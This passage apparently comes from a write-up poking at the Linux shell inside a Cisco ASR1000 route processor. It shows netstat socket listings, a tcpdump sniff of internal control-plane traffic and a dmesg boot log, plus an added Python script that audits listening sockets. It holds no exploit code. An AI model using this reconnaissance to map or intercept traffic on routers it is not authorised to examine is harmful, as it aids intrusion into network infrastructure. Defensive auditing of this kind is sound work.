tcp 0 0 rp0-0:2007 rp0-0:51935 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:52708 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:57909 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:51505 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:59003 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:49040 ESTABLISHED
tcp 0 0 rp0-0:2000 rp1-0:41398 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:55729 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:39608 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:59833 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:39923 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:39164 ESTABLISHED
tcp 0 0 rp0-0:2001 fp1-0:44301 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:32776 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:52535 ESTABLISHED
tcp 0 0 rp0-0:2006 fp1-0:44140 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:56444 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:46201 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:60288 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:35750 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:49577 ESTABLISHED
tcp 0 0 rp0-0:2000 fp1-0:36776 ESTABLISHED
tcp 0 0 rp0-0:2008 fp1-0:48583 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:51417 ESTABLISHED
tcp 0 0 rp0-0:2007 fp1-0:38141 ESTABLISHED
tcp 0 0 rp0-0:2004 fp1-0:38906 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:48903 ESTABLISHED
tcp 0 0 rp0-0:2004 fp0-0:43527 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:50988 ESTABLISHED
tcp 0 0 rp0-0:2006 fp0-0:55081 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:40246 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:52016 ESTABLISHED
tcp 0 2624 192.168.0.1:16023 192.168.0.2:26113 ESTABLISHED
tcp 0 0 rp0-0:37037 fp0-0:2518 TIME_WAIT
tcp 0 0 rp0-0:2000 cc1-0:37705 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:35159 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:51290 ESTABLISHED
tcp 0 0 rp0-0:2001 fp0-0:48236 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:46700 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:48745 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:36722 ESTABLISHED
tcp 0 0 rp0-0:2008 cc1-0:35195 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:36247 ESTABLISHED
tcp 0 0 rp0-0:2002 cc1-0:41618 ESTABLISHED
tcp 0 0 rp0-0:2416 fp0-0:47275 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:35749 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:49577 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:39850 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:35767 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:33982 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:41942 ESTABLISHED
tcp 0 0 rp0-0:2000 fp0-0:60374 ESTABLISHED
tcp 0 0 rp0-0:2007 fp0-0:52448 ESTABLISHED
tcp 0 0 rp0-0:2418 fp0-0:59884 ESTABLISHED
tcp 0 0 rp0-0:2008 fp0-0:60663 ESTABLISHED
udp 0 0 *:32768 *:*
udp 0 0 *:nfs *:*
udp 0 0 *:4006 *:*
udp 0 0 *:tftp *:*
udp 0 0 *:tftp-private *:*
udp 0 0 *:sunrpc *:*
udp 0 0 *:890 *:*
udp 0 0 *:ntp *:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 33582 /tmp/rp/lipc/chassis_mgr_socket
unix 2 [ ACC ] STREAM LISTENING 32347 /tmp/rp/lipc/interface_mgr_socket
unix 2 [ ] DGRAM 19425 @/org/kernel/udev/udevd
unix 2 [ ACC ] STREAM LISTENING 37744 /tmp/rp/lipc/resvport_iosquery
unix 2 [ ACC ] STREAM LISTENING 36468 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 2 [ ACC ] STREAM LISTENING 37749 /tmp/rp/lipc/iosd_vtymgt_socket
unix 2 [ ACC ] STREAM LISTENING 32118 /tmp/rp/lipc/forwarding_mgr_socket
unix 2 [ ACC ] STREAM LISTENING 36474 /tmp/rp/lipc/shell_mgr_ui_serv_socket
unix 2 [ ACC ] STREAM LISTENING 36477 /tmp/rp/lipc/shell_mgr_iosd_socket
unix 2 [ ACC ] STREAM LISTENING 32951 /tmp/rp/lipc/plog_iosd_serv_socket
unix 6 [ ] DGRAM 32954 /dev/log
unix 2 [ ] STREAM 16114379
unix 2 [ ] DGRAM 40132
unix 3 [ ] STREAM CONNECTED 37889 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37888
unix 3 [ ] STREAM CONNECTED 37814 /tmp/rp/lipc/plog_iosd_serv_socket
unix 3 [ ] STREAM CONNECTED 37807
unix 3 [ ] STREAM CONNECTED 37813 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37805
unix 3 [ ] STREAM CONNECTED 37812 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37804
unix 3 [ ] STREAM CONNECTED 37811 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37803
unix 3 [ ] STREAM CONNECTED 37810 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37802
unix 3 [ ] STREAM CONNECTED 37809 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37801
unix 3 [ ] STREAM CONNECTED 37808 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37800
unix 3 [ ] STREAM CONNECTED 37775 /tmp/rp/lipc/shell_mgr_bshell_serv_socket
unix 3 [ ] STREAM CONNECTED 37764
unix 3 [ ] STREAM CONNECTED 37774 /tmp/rp/lipc/shell_mgr_iosd_socket
unix 3 [ ] STREAM CONNECTED 37762
unix 3 [ ] STREAM CONNECTED 37771 /tmp/rp/lipc/interface_mgr_socket
unix 3 [ ] STREAM CONNECTED 37761
unix 3 [ ] STREAM CONNECTED 37763 /tmp/rp/lipc/forwarding_mgr_socket
unix 3 [ ] STREAM CONNECTED 37760
unix 3 [ ] STREAM CONNECTED 37661 /tmp/rp/lipc/chassis_mgr_socket
unix 2 [ ] DGRAM 36977
unix 2 [ ] DGRAM 36959
unix 2 [ ] DGRAM 29783
unix 2 [ ] DGRAM 23136
unix 2 [ ] DGRAM 23126
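
For an exposure review, the netstat output above reduces to three questions: which sockets listen on every interface, which are bound to one address, and which hosts hold established sessions. The following is an added example, not part of the original post: the sample is a subset of the lines above, and `WATCHLIST` is an assumption made here (service names from the listing that merit a second look when bound to `*`).

```python
from collections import Counter

# Subset of the `netstat -av` lines shown above, copied unchanged.
NETSTAT_SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:2400 *:* LISTEN
tcp 0 0 *:nfs *:* LISTEN
tcp 0 0 *:rsync *:* LISTEN
tcp 0 0 rp0-0:16023 *:* LISTEN
tcp 0 0 192.168.0.1:16023 *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 rp0-0:50835 rp0-0:2007 ESTABLISHED
tcp 0 0 rp0-0:2007 rp0-0:50835 ESTABLISHED
tcp 0 0 rp0-0:2007 rp1-0:57909 ESTABLISHED
tcp 0 0 rp0-0:2001 fp1-0:44301 ESTABLISHED
tcp 0 0 rp0-0:2007 cc1-0:50988 ESTABLISHED
tcp 0 2624 192.168.0.1:16023 192.168.0.2:26113 ESTABLISHED
tcp 0 0 rp0-0:37037 fp0-0:2518 TIME_WAIT
udp 0 0 *:tftp *:*
udp 0 0 *:ntp *:*
Active UNIX domain sockets (servers and established)
unix 2 [ ACC ] STREAM LISTENING 33582 /tmp/rp/lipc/chassis_mgr_socket
"""

# Assumption for this example: names to review when bound to all interfaces.
WATCHLIST = {"telnet", "tftp", "nfs", "rsync", "sunrpc", "daytime"}


def parse_netstat(text):
    """Return one dict per tcp/udp line; headers and unix sockets are skipped."""
    socks = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 5 or f[0] not in ("tcp", "udp"):
            continue
        if ":" not in f[3] or ":" not in f[4]:
            continue
        lhost, lport = f[3].rsplit(":", 1)   # host part may itself be an IP
        rhost, rport = f[4].rsplit(":", 1)
        socks.append({"proto": f[0], "lhost": lhost, "lport": lport,
                      "rhost": rhost, "rport": rport,
                      "state": f[5] if len(f) > 5 else ""})  # udp has no state
    return socks


def _is_listener(s):
    # TCP reports LISTEN; an unconnected UDP socket shows *:* as its peer.
    return s["state"] == "LISTEN" or (s["proto"] == "udp" and s["rhost"] == "*")


def wildcard_listeners(socks):
    """(proto, port) for sockets accepting traffic on every interface."""
    return [(s["proto"], s["lport"]) for s in socks
            if _is_listener(s) and s["lhost"] == "*"]


def bound_listeners(socks):
    """(proto, host, port) for listeners tied to one local address."""
    return [(s["proto"], s["lhost"], s["lport"]) for s in socks
            if _is_listener(s) and s["lhost"] != "*"]


def watchlist_hits(socks):
    """Wildcard listeners whose service name is on WATCHLIST."""
    return [(p, port) for p, port in wildcard_listeners(socks) if port in WATCHLIST]


def remote_peers(socks):
    """Established sessions per remote host, ignoring local-to-local pairs."""
    c = Counter(s["rhost"] for s in socks
                if s["state"] == "ESTABLISHED" and s["rhost"] != s["lhost"])
    return dict(c)


if __name__ == "__main__":
    socks = parse_netstat(NETSTAT_SAMPLE)
    print("wildcard listeners:", wildcard_listeners(socks))
    print("address-bound listeners:", bound_listeners(socks))
    print("watchlist hits:", watchlist_hits(socks))
    print("remote peers:", remote_peers(socks))
```
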


A little sniffing of the internal communications (ifconfig causes a segmentation fault):


[ASR1k_RP_0:/]$ /usr/sbin/tcpdump
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on liin, link-type EN10MB (Ethernet), capture size 68 bytes
10:36:33.354644 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 1584868254 win 3133
10:36:33.354949 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 1:148(147) ack 0 win 6432
10:36:33.555735 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 148 win 2986
10:36:33.555889 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 148:320(172) ack 0 win 6432
10:36:33.759245 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 320 win 2814
10:36:33.760154 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 320:487(167) ack 0 win 6432
10:36:33.760278 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 487 win 4128
10:36:33.761138 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 487:654(167) ack 0 win 6432
10:36:33.961457 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 654 win 3961
10:36:33.962425 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 654:821(167) ack 0 win 6432
10:36:34.162703 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 821 win 3794
10:36:34.163674 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 821:988(167) ack 0 win 6432
10:36:34.380235 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 988 win 3627
10:36:34.380949 IP 192.168.0.1.16023 > 192.168.0.2.31233: P 988:1155(167) ack 0 win 6432
10:36:34.581488 IP 192.168.0.2.31233 > 192.168.0.1.16023: . ack 1155 win 3460


Print the kernel message buffer (and a lot of details about the hardware):

[ASR1k_RP_0:/]$ dmesg
Bootdata ok (command line is root=/dev/ram rw console=ttyS1,9600 max_loop=64 SR_BOOT=bootflash:asr1000rp2-advipservicesk9.02.04.02.122-33.XND2.bin)
Linux version 2.6.18.8 (mcpre@mcp-bld-lnx-113) (gcc version 4.2.1) #8 SMP Wed Nov 4 23:10:18 PST 2009
BIOS-provided physical RAM map:
BIOS-e820: 0000000000000000 - 000000000008f000 (usable)
BIOS-e820: 000000000008f000 - 0000000000090000 (ACPI NVS)
BIOS-e820: 0000000000090000 - 00000000000a0000 (usable)
BIOS-e820: 0000000000100000 - 0000000061eca000 (usable)
BIOS-e820: 0000000061eca000 - 000000006f623000 (reserved)
BIOS-e820: 000000006f623000 - 000000007e716000 (usable)
BIOS-e820: 000000007e716000 - 000000007e71e000 (ACPI NVS)
BIOS-e820: 000000007e71e000 - 000000007e72f000 (usable)
BIOS-e820: 000000007e72f000 - 000000007e731000 (reserved)
BIOS-e820: 000000007e731000 - 000000007e733000 (usable)
BIOS-e820: 000000007e733000 - 000000007e735000 (reserved)
BIOS-e820: 000000007e735000 - 000000007e737000 (usable)
BIOS-e820: 000000007e737000 - 000000007e739000 (reserved)
BIOS-e820: 000000007e739000 - 000000007e73b000 (usable)
BIOS-e820: 000000007e73b000 - 000000007e73d000 (reserved)
BIOS-e820: 000000007e73d000 - 000000007e741000 (usable)
BIOS-e820: 000000007e741000 - 000000007e742000 (reserved)
BIOS-e820: 000000007e742000 - 000000007e74b000 (usable)
BIOS-e820: 000000007e74b000 - 000000007e74c000 (reserved)
BIOS-e820: 000000007e74c000 - 000000007e751000 (usable)
BIOS-e820: 000000007e751000 - 000000007e755000 (reserved)
BIOS-e820: 000000007e755000 - 000000007e758000 (usable)
BIOS-e820: 000000007e758000 - 000000007e75a000 (reserved)
BIOS-e820: 000000007e75a000 - 000000007e762000 (ACPI data)
BIOS-e820: 000000007e762000 - 000000007e763000 (usable)
BIOS-e820: 000000007e763000 - 000000007e768000 (ACPI data)
BIOS-e820: 000000007e768000 - 000000007e774000 (usable)
BIOS-e820: 000000007e774000 - 000000007e77a000 (ACPI data)
BIOS-e820: 000000007e77a000 - 000000007e77c000 (usable)
BIOS-e820: 000000007e77c000 - 000000007e77d000 (ACPI NVS)
BIOS-e820: 000000007e77d000 - 000000007e77e000 (ACPI data)
BIOS-e820: 000000007e77e000 - 000000007e77f000 (ACPI NVS)
BIOS-e820: 000000007e77f000 - 000000007e781000 (usable)
BIOS-e820: 000000007e781000 - 000000007e785000 (reserved)
BIOS-e820: 000000007e785000 - 000000007e787000 (usable)
BIOS-e820: 000000007e787000 - 000000007e789000 (reserved)
BIOS-e820: 000000007e789000 - 000000007e78a000 (usable)
BIOS-e820: 000000007e78a000 - 000000007e78b000 (reserved)
BIOS-e820: 000000007e78b000 - 000000007e79d000 (usable)
BIOS-e820: 000000007e79d000 - 000000007e79e000 (ACPI data)
BIOS-e820: 000000007e79e000 - 000000007e820000 (usable)
BIOS-e820: 000000007e820000 - 000000007e824000 (reserved)
BIOS-e820: 000000007e824000 - 000000007e830000 (usable)
BIOS-e820: 000000007e830000 - 000000007e831000 (reserved)
BIOS-e820: 000000007e831000 - 000000007e842000 (usable)
BIOS-e820: 000000007e842000 - 000000007e845000 (reserved)
BIOS-e820: 000000007e845000 - 000000007e847000 (usable)
BIOS-e820: 000000007e847000 - 000000007e84b000 (reserved)
BIOS-e820: 000000007e84b000 - 000000007e84d000 (usable)
BIOS-e820: 000000007e84d000 - 000000007e859000 (reserved)
BIOS-e820: 000000007e859000 - 000000007e867000 (usable)
BIOS-e820: 000000007e867000 - 000000007e869000 (ACPI NVS)
BIOS-e820: 000000007e869000 - 000000007e86a000 (usable)
BIOS-e820: 000000007e86a000 - 000000007e86b000 (ACPI NVS)
BIOS-e820: 000000007e86b000 - 000000007e870000 (reserved)
BIOS-e820: 000000007e870000 - 000000007e876000 (usable)
BIOS-e820: 000000007e876000 - 000000007e878000 (reserved)
BIOS-e820: 000000007e878000 - 000000007e882000 (usable)
BIOS-e820: 000000007e882000 - 000000007e883000 (ACPI NVS)
BIOS-e820: 000000007e883000 - 000000007e88b000 (usable)
BIOS-e820: 000000007e88b000 - 000000007ea8b000 (ACPI NVS)
BIOS-e820: 000000007ea8b000 - 000000007eaae000 (usable)
BIOS-e820: 000000007eaae000 - 000000007eab1000 (ACPI NVS)
BIOS-e820: 000000007eab1000 - 000000007eab2000 (usable)
BIOS-e820: 000000007eab2000 - 000000007eabc000 (ACPI NVS)
BIOS-e820: 000000007eabc000 - 000000007eaec000 (usable)
BIOS-e820: 000000007eaec000 - 000000007eaed000 (ACPI NVS)
BIOS-e820: 000000007eaed000 - 000000007eaee000 (usable)
BIOS-e820: 000000007eaee000 - 000000007eaf1000 (reserved)
BIOS-e820: 000000007eaf1000 - 000000007eaf2000 (usable)
BIOS-e820: 000000007eaf2000 - 000000007eb2d000 (reserved)
BIOS-e820: 000000007eb2d000 - 000000007eb33000 (usable)
BIOS-e820: 000000007eb33000 - 000000007eb34000 (reserved)
BIOS-e820: 000000007eb34000 - 000000007eb35000 (usable)
BIOS-e820: 000000007eb35000 - 000000007eb36000 (reserved)
BIOS-e820: 000000007eb36000 - 000000007eb42000 (usable)
BIOS-e820: 000000007eb42000 - 000000007eb44000 (reserved)
BIOS-e820: 000000007eb44000 - 000000007eb4a000 (usable)
BIOS-e820: 000000007eb4a000 - 000000007eb50000 (reserved)
BIOS-e820: 000000007eb50000 - 000000007eb74000 (usable)
BIOS-e820: 000000007eb74000 - 000000007eb75000 (reserved)
BIOS-e820: 000000007eb75000 - 000000007eb77000 (usable)
BIOS-e820: 000000007eb77000 - 000000007eb78000 (reserved)
BIOS-e820: 000000007eb78000 - 000000007efab000 (usable)
BIOS-e820: 000000007efab000 - 000000007efac000 (reserved)
BIOS-e820: 000000007efac000 - 000000007efad000 (usable)
BIOS-e820: 000000007efad000 - 000000007efaf000 (reserved)
BIOS-e820: 000000007efaf000 - 000000007efdf000 (usable)
BIOS-e820: 000000007efdf000 - 000000007efe1000 (reserved)
BIOS-e820: 000000007efe1000 - 000000007f60d000 (usable)
BIOS-e820: 000000007f60d000 - 000000007f60e000 (reserved)
BIOS-e820: 000000007f60e000 - 000000007f618000 (usable)
BIOS-e820: 000000007f618000 - 000000007f61a000 (reserved)
BIOS-e820: 000000007f61a000 - 000000007fc00000 (usable)
BIOS-e820: 00000000e0000000 - 00000000f0000000 (reserved)
BIOS-e820: 00000000fec00000 - 00000000fec01000 (reserved)
BIOS-e820: 00000000fff00000 - 0000000100000000 (reserved)
BIOS-e820: 0000000100000000 - 000000027fffe000 (usable)
BIOS-e820: 000000027fffe000 - 0000000280000000 (reserved)
DMI not present or invalid.
ACPI: RSDP (v002 INSYDE ) @ 0x00000000000e0000
ACPI: XSDT (v001 INSYDE BEARLAKE 0x00000003 0x01000013) @ 0x000000007e79d120
ACPI: FADT (v003 INSYDE BEARLAKE 0x00000003 INTL 0x0100000d) @ 0x000000007e77d000
ACPI: MADT (v001 INSYDE BEARLAKE 0x00000003 INTL 0x0100000d) @ 0x000000007e776000
ACPI: WDDT (v001 INSYDE BEARLAKE 0x00000003 INTL 0x0100000d) @ 0x000000007e775000
ACPI: MCFG (v001 INSYDE BEARLAKE 0x00000003 INTL 0x0100000d) @ 0x000000007e774000
ACPI: HPET (v001 INSYDE BEARLAKE 0x00000003 INTL 0x0100000d) @ 0x000000007e767000
ACPI: ASF! (v032 INTEL 559/ 0x00000001 TFSM 0x000f4240) @ 0x000000007e766000
ACPI: SPCR (v001 INSYDE BEARLAKE 0x00000003 INTL 0x0100000d) @ 0x000000007e765000
ACPI: DMAR (v001 0x00000001 0x00000000) @ 0x000000007e764000
ACPI: SSDT (v001 INTEL SataAhci 0x00001000 INTL 0x20051117) @ 0x000000007e75d000
ACPI: SSDT (v001 DpgPmm CpuPm 0x00000012 INTL 0x20051117) @ 0x000000007e75c000
ACPI: SSDT (v001 DpgPmm Cpu0Ist 0x00000011 INTL 0x20051117) @ 0x000000007e75b000
ACPI: SSDT (v001 DpgPmm Cpu1Ist 0x00000012 INTL 0x20051117) @ 0x000000007e75a000
ACPI: DSDT (v001 INTEL BROADWAT 0x00000003 INTL 0x20051117) @ 0x0000000000000000
No NUMA configuration found
Faking a node at 0000000000000000-000000027fffe000
Bootmem setup node 0 0000000000000000-000000027fffe000
No mptable found.
On node 0 totalpages: 1996807
DMA zone: 1498 pages, LIFO batch:0
DMA32 zone: 447022 pages, LIFO batch:31
Normal zone: 1548287 pages, LIFO batch:31
ACPI: PM-Timer IO Port: 0x408
ACPI: Local APIC address 0xfee00000
ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled)
Processor #0 7:7 APIC version 20
ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
Processor #1 7:7 APIC version 20
ACPI: LAPIC (acpi_id[0x03] lapic_id[0x02] disabled)
ACPI: LAPIC (acpi_id[0x04] lapic_id[0x03] disabled)
ACPI: LAPIC_NMI (acpi_id[0x01] dfl dfl lint[0x1])
ACPI: LAPIC_NMI (acpi_id[0x02] dfl dfl lint[0x1])
ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0])
IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23
ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)
ACPI: IRQ0 used by override.
ACPI: IRQ2 used by override.
ACPI: IRQ9 used by override.
Setting APIC routing to physical flat
ACPI: HPET id: 0x8086a201 base: 0xfed00000
Using ACPI (MADT) for SMP configuration information
Allocating PCI resources starting at 80000000 (gap: 7fc00000:60400000)
SMP: Allowing 4 CPUs, 2 hotplug CPUs
Built 1 zonelists. Total pages: 1996807
Kernel command line: root=/dev/ram rw console=ttyS1,9600 max_loop=64 SR_BOOT=bootflash:asr1000rp2-advipservicesk9.02.04.02.122-33.XND2.bin
Initializing CPU#0
PID hash table entries: 4096 (order: 12, 32768 bytes)
time.c: Using 14.318180 MHz WALL HPET GTOD HPET/TSC timer.
time.c: Detected 2660.009 MHz processor.
Dentry cache hash table entries: 1048576 (order: 11, 8388608 bytes)
Inode-cache hash table entries: 524288 (order: 10, 4194304 bytes)
Checking aperture...
PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
Placing software IO TLB between 0x1c7a000 - 0x5c7a000
Memory: 7908448k/10485752k available (2549k kernel code, 252364k reserved, 1411k data, 5188k init)
Calibrating delay using timer specific routine.. 5323.64 BogoMIPS (lpj=2661821)
Security Framework v1.0.0 initialized
Capability LSM initialized
Mount-cache hash table entries: 256
CPU: L1 I cache: 32K, L1 D cache: 32K
CPU: L2 cache: 6144K
using mwait in idle threads.
CPU: Physical Processor ID: 0
CPU: Processor Core ID: 0
CPU0: Thermal monitoring enabled (TM2)
SMP alternatives: switching to UP code
ACPI: Core revision 20060707
Using local APIC timer interrupts.
result 20781310
Detected 20.781 MHz APIC timer.
SMP alternatives: switching to SMP code
Booting processor 1/2 APIC 0x1
Initializing CPU#1
Calibrating delay using timer specific routine.. 5319.97 BogoMIPS (lpj=2659989)
CPU: L1 I cache: 32K, L1 D cache: 32K
CPU: L2 cache: 6144K
CPU: Physical Processor ID: 0
CPU: Processor Core ID: 1
CPU1: Thermal monitoring enabled (TM2)
Intel(R) Xeon(R) CPU L5238 @ 2.66GHz stepping 06
Brought up 2 CPUs
testing NMI watchdog ... OK.
migration_cost=15
ASR: rp2_RpDevRstCntrl initial 20100000 p ffffc2000000a000
ASR: cpld eusb reset done
isord_start=ffff810061eca018 isord_end=ffff81006f5ec018
NET: Registered protocol family 16
ACPI: bus type pci registered
PCI: Using MMCONFIG at e0000000
ACPI: Interpreter enabled
ACPI: Using IOAPIC for interrupt routing
ACPI: PCI Root Bridge [PCI0] (0000:00)
PCI: Probing PCI hardware (bus 00)
ACPI: Assume root bridge [\_SB_.PCI0] bus is 0
PCI: 0000:00:03.0: class 600 doesn't match header type 01. Ignoring class.
PCI: 0000:00:05.0: class 600 doesn't match header type 01. Ignoring class.
PCI: 0000:00:06.0: class 600 doesn't match header type 01. Ignoring class.
PCI: 0000:00:07.0: class 600 doesn't match header type 01. Ignoring class.
PCI: Transparent bridge - 0000:00:1e.0
ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT]
ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.NPE2._PRT]
ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.NPE4._PRT]
ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.NPE6._PRT]
ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P32_._PRT]
ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 7<7>Losing some ticks... checking if CPU frequency changed.
9 *10 11 12)
ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 7 *9 10 11 12)
ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 7 *9 10 11 12)
ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 *5 7 9 10 11 12)
ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 7 9 *10 11 12)
ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 7 9 10 *11 12)
ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 7 9 *10 11 12)
ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 7 9 10 11 12) *0, disabled.
Linux Plug and Play Support v0.97 (c) Adam Belay
pnp: PnP ACPI init
pnp: PnP ACPI: found 14 devices
SCSI subsystem initialized
usbcore: registered new driver usbfs
usbcore: registered new driver hub
PCI: Using ACPI for IRQ routing
PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report
hpet0: at MMIO 0xfed00000 (virtual 0xffffffffff5fe000), IRQs 2, 8, 0, 0
hpet0: 4 64-bit timers, 14318180 Hz
PCI-GART: No AMD northbridge found.
pnp: 00:06: ioport range 0x500-0x53f has been reserved
pnp: 00:06: ioport range 0x400-0x47f could not be reserved
pnp: 00:06: ioport range 0x680-0x6ff has been reserved
PCI: Bridge: 0000:00:02.0
IO window: 7000-7fff
MEM window: 80000000-c10fffff
PREFETCH window: c1100000-c20fffff
PCI: not setting up bridge 0000:00:03.0 for bus 2
PCI: Bridge: 0000:00:04.0
IO window: 4000-5fff
MEM window: ca100000-cb1fffff
PREFETCH window: c3100000-c40fffff
PCI: not setting up bridge 0000:00:05.0 for bus 4
PCI: not setting up bridge 0000:00:06.0 for bus 5
PCI: not setting up bridge 0000:00:07.0 for bus 6
PCI: Bridge: 0000:00:1e.0
IO window: disabled.
MEM window: disabled.
PREFETCH window: disabled.
GSI 16 sharing vector 0xA9 and IRQ 16
ACPI: PCI Interrupt 0000:00:02.0[A] -> GSI 16 (level, low) -> IRQ 169
PCI: Setting latency timer of device 0000:00:02.0 to 64
PCI: Enabling device 0000:00:03.0 (0000 -> 0003)
PCI: Setting latency timer of device 0000:00:03.0 to 64
ACPI: PCI Interrupt 0000:00:04.0[A] -> GSI 16 (level, low) -> IRQ 169
PCI: Setting latency timer of device 0000:00:04.0 to 64
PCI: Enabling device 0000:00:05.0 (0000 -> 0003)
PCI: Setting latency timer of device 0000:00:05.0 to 64
PCI: Enabling device 0000:00:06.0 (0000 -> 0003)
PCI: Setting latency timer of device 0000:00:06.0 to 64
PCI: Enabling device 0000:00:07.0 (0000 -> 0003)
PCI: Setting latency timer of device 0000:00:07.0 to 64
PCI: Setting latency timer of device 0000:00:1e.0 to 64
NET: Registered protocol family 2
IP route cache hash table entries: 262144 (order: 9, 2097152 bytes)
TCP established hash table entries: 1048576 (order: 13, 33554432 bytes)
TCP bind hash table entries: 65536 (order: 9, 2097152 bytes)
TCP: Hash tables configured (established 1048576 bind 65536)
TCP reno registered
Total HugeTLB memory allocated, 0
NTFS driver 2.1.27 [Flags: R/O].
Initializing Cryptographic API
io scheduler noop registered
io scheduler anticipatory registered
io scheduler deadline registered
io scheduler cfq registered (default)
PCI: Setting latency timer of device 0000:00:02.0 to 64
assign_interrupt_mode Found MSI capability
Allocate Port Service[0000:00:02.0:pcie00]
Allocate Port Service[0000:00:02.0:pcie01]
PCI: Setting latency timer of device 0000:00:04.0 to 64
assign_interrupt_mode Found MSI capability
Allocate Port Service[0000:00:04.0:pcie00]
Allocate Port Service[0000:00:04.0:pcie01]
pci_hotplug: PCI Hot Plug PCI Core version: 0.5
ACPI: Processor [CPU0] (supports 8 throttling states)
ACPI: Processor [CPU1] (supports 8 throttling states)
ACPI Exception (acpi_processor-0681): AE_NOT_FOUND, Processor Device is not present [20060707]
ACPI: Getting cpuindex for acpiid 0x3
ACPI Exception (acpi_processor-0681): AE_NOT_FOUND, Processor Device is not present [20060707]
ACPI: Getting cpuindex for acpiid 0x4
Real Time Clock Driver v1.12ac
hpet_resources: 0xfed00000 is busy
Linux agpgart interface v0.101 (c) Dave Jones
Serial: 8250/16550 driver $Revision: 1.90 $ 2 ports, IRQ sharing disabled
serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
serial8250: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A
pnp: Device 00:0b disabled.
RAMDISK driver initialized: 16 RAM disks of 65536K size 1024 blocksize
loop: loaded (max 64 devices)
libata version 2.00 loaded.
ahci 0000:00:1f.2: version 2.0
GSI 17 sharing vector 0xC9 and IRQ 17
